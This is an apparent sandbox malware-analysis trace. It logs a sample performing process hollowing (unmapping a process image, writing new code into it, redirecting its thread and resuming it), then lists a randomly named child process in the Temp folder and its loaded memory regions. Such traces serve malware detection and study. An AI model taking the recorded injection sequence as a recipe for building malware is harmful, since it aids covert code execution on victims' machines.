[46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, 
[232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, 
[413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0174.735] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdb008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0174.735] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0174.735] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0174.735] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x284758*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x284758*, lpNumberOfBytesWritten=0x0) returned 1 [0174.736] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x284b58, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0174.736] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x284b58*, 
nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x284b58*, lpNumberOfBytesWritten=0x0) returned 1 [0174.745] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x2d9158*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d9158*, lpNumberOfBytesWritten=0x0) returned 1 [0174.745] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdb008, lpBuffer=0x28488c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x28488c*, lpNumberOfBytesWritten=0x0) returned 1 [0174.745] SetThreadContext (hThread=0x48, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdb000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, 
[12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, 
[201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, 
[382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0174.746] ResumeThread (hThread=0x48) returned 0x1 [0174.746] CloseHandle (hObject=0x48) returned 1 [0174.746] CloseHandle (hObject=0x4c) returned 1 [0174.746] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0174.747] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0174.747] ExitProcess (uExitCode=0x0) Process: id = "310" image_name = "wspgagwn.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe" page_root = "0x7ea16c20" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges 
= "0x60800000" monitor_reason = "child_process" parent_id = "309" os_parent_pid = "0xda0" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24031 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24032 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 24033 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 24034 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 24035 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24036 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24037 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24038 start_va = 0x7ffdb000 end_va = 
0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 24039 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24040 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24041 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24042 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 24043 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 24044 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 24045 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24046 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24047 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 24048 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: 
id = 24049 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 24050 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24051 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24052 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24053 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24054 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 24055 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24056 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 24057 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = 
"\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24058 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24059 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24060 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24061 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24062 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 24063 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 24064 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 24065 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 24066 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 24067 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 24088 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = 
mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 24089 start_va = 0x1440000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 24090 start_va = 0x1570000 end_va = 0x183efff entry_point = 0x1570000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 24091 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 24092 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 24098 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 24099 start_va = 0x1840000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 24100 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 24101 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24102 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 24103 start_va = 0x1940000 